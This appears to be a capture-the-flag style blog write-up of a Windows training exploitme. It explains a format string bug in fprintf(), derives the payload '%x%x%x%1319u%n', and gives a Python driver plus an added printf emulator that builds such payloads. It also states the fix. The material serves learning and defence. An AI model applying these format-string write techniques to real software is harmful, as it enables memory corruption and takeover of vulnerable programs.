Windows Exploitme: The Girl

Last time I mentioned that, after completing Gerardo Richarte's Advanced Buffer Overflows challenge, I wanted to make an incursion into Windows exploitation territory. As I said, I already had an eye on some juicy Windows exploitmes, and here is the first installment. The exploitme in question is a simple exe file that performs a simple authentication procedure. Our mission this time is to overwrite a local variable called id and make the program print "1337". You can get the binary and my Python exploit from here. The vulnerability is a textbook format string bug: one of the functions calls fprintf() with user-controlled data as the format string instead of specifying a format explicitly. Let's take a look at the disassembly to get a deeper view:
.text:00401415                 push    ebp
.text:00401416                 mov     ebp, esp
.text:00401418                 sub     esp, 8
.text:0040141B                 mov     eax, [ebp+arg_8] ; id
.text:0040141E                 mov     dword ptr [eax], 0FFFFFFFFh
.text:00401424                 mov     eax, [ebp+arg_8]
.text:00401427                 cmp     dword ptr [eax], 0FFFFFFFFh
.text:0040142A                 jnz     short locret_401440
.text:0040142C                 mov     eax, [ebp+arg_0] ; load *username
.text:0040142F                 mov     [esp+8+var_4], eax
.text:00401433                 mov     eax, ds:dword_404090 ; load *fd pointer
.text:00401438                 mov     [esp+8+var_8], eax
.text:0040143B                 call    fprintf

As I said earlier, the parameters are handed straight to fprintf() without any kind of check: the username pointer loaded from arg_0 becomes the format string. Now let's focus on how we can exploit this situation. If we run the executable inside a debugger and place a breakpoint in the right place (placing it at 0x00401438, just before the call to fprintf(), did the job for me), we can see in the stack dump area that the dwords fprintf() will treat as its variable arguments sit right above the format string on the stack. To be more precise, the pointer to our id field is the fifth dword fprintf() will consume, i.e. exactly 4 dwords after the first one (remember, the format string itself is stored in the stack, and so is the pointer to id that this function received in arg_8). Theory tells us that each "%x" makes printf advance its argument pointer by one dword, because it pops an unsigned integer to print in hex. Therefore all we need to do is climb a few dwords up the stack and then perform a write with the "%n" conversion, which stores the number of bytes written so far through the pointer found in the next argument slot. Since the objective in this exploit is to write 1337 into the id field, we need to pad the output until exactly 1337 bytes have been printed, and a field width on a "%u" conversion does that for us (it also consumes one more dword, the fourth one on the way to the pointer). Recapping, our username field will have to be "%x%x%x%1319u%n" for the exploit to succeed. One caveat: the 1319 is not magic. 1337 - 1319 = 18, so the three "%x" conversions must have printed 18 bytes on the run the payload was tuned for (six hex digits each); if the values in your stack dump print with a different number of digits, adjust the padding accordingly, or use fixed widths such as "%8x" so the count no longer depends on them. Here's a Python snippet that will do the job; a complete working script is also packed alongside the binary in the zip I linked at the beginning.
import subprocess

# Three %x and the %u consume the four dwords that sit before the pointer to
# id; the width on %u pads the output to exactly 1337 bytes, and %n stores
# that count through the next dword, which is the pointer to id.
username = "%x%x%x%1319u%n" + "\n"
password = "insertrandomsequencehere()" + "\n"

# Feed both lines on stdin and read back whatever the binary prints.
proc = subprocess.Popen(["02-lizer-girl.exe"], stdin=subprocess.PIPE,
                        stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
output, _ = proc.communicate((username + password).encode())
print(output[:100].decode(errors="replace"))

That's it. Not a tough one this time; I just wanted to tinker a little in Windows and get used to the new tools. Hope you guys enjoyed it as much as I did. See you around, and don't forget to keep adding NOPs! :-)
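As an addendum, here is an added example that is not part of the original post or the zip: a small Python emulator of the part of printf that matters for this bug, namely how every conversion consumes one argument slot and what count "%n" stores through the slot it lands on. It walks a constructed stand-in for the stack dump seen at the breakpoint (the dword values and the address of id are made up for the demo), builds the payload for any number of slots to skip and any target value, and confirms that for four skipped slots holding six-digit hex values the payload comes out as %x%x%x%1319u%n and "%n" stores 1337. It also flags the two cases the walkthrough glosses over: a target smaller than what the "%x" output has already consumed, and a format that reaches past the supplied slots.

```python
import re

# Added example, not code from the exploitme or the original post.
# Emulates how printf consumes argument slots and what "%n" stores, so a
# payload can be tuned without guessing. Stack values below are constructed.

_SPEC = re.compile(r"%(\d*)([xudn%])")
_MASK = 0xFFFFFFFF   # 32-bit dwords, as in the exploitme


def printf_count(fmt, slots):
    """Walk fmt the way printf walks its variable arguments.

    slots: the dwords at the vararg positions, in the order printf reads them.
    Returns (bytes_printed, writes); writes maps the dword a "%n" consumed
    (the pointer it writes through) to the count it stores there.
    """
    count, writes, pos, next_slot = 0, {}, 0, 0
    while pos < len(fmt):
        if fmt[pos] != "%":
            count += 1                     # literal byte
            pos += 1
            continue
        m = _SPEC.match(fmt, pos)
        if not m:
            raise ValueError("unsupported conversion at offset %d" % pos)
        width, conv = m.groups()
        pos = m.end()
        if conv == "%":
            count += 1                     # "%%" prints a single '%'
            continue
        if next_slot >= len(slots):
            raise IndexError("format reads slot %d but only %d supplied"
                             % (next_slot + 1, len(slots)))
        value = slots[next_slot] & _MASK
        next_slot += 1
        if conv == "n":
            writes[value] = count          # the dword is used as a pointer
        else:
            if conv == "d" and value >= 0x80000000:
                value -= 0x100000000       # "%d" reinterprets as signed
            text = format(value, "x" if conv == "x" else "d")
            count += max(len(text), int(width or 0))   # width only pads
    return count, writes


def build_payload(skip, target, slots):
    """Build "%x...%<width>u%n" so that "%n" consumes slot skip+1 and stores
    target. slots[:skip] must hold the dwords the "%x"/"%u" will print (read
    them in the debugger), because their printed length eats into the count.
    """
    if skip < 1 or len(slots) < skip:
        raise ValueError("need the values of all %d skipped slots" % skip)
    printed = sum(len(format(v & _MASK, "x")) for v in slots[:skip - 1])
    width = target - printed
    if width < len(str(slots[skip - 1] & _MASK)):
        raise ValueError("target %d already exceeded: %%x output is %d bytes"
                         % (target, printed))
    return "%x" * (skip - 1) + "%" + str(width) + "u%n"


# Constructed stand-in for the stack dump at the breakpoint: saved ebp, return
# address, the two string pointers, then the pointer to id (all made-up values).
ID_PTR = 0x0022FF5C
STACK = [0x0022FF78, 0x00401234, 0x00403020, 0x00403040, ID_PTR]


def demo(target=1337):
    """Return the payload for STACK and the value "%n" stores into id."""
    payload = build_payload(4, target, STACK)
    _, writes = printf_count(payload, STACK)
    return payload, writes.get(ID_PTR)


if __name__ == "__main__":
    print("%s -> id = %d" % demo())
```

Swap STACK for the real dwords from your debugger and build_payload() gives the width for that run instead of a hard-coded 1319. On the defender's side the fix is the one the bug implies: pass the user input as an argument, fprintf(fd, "%s", username), never as the format.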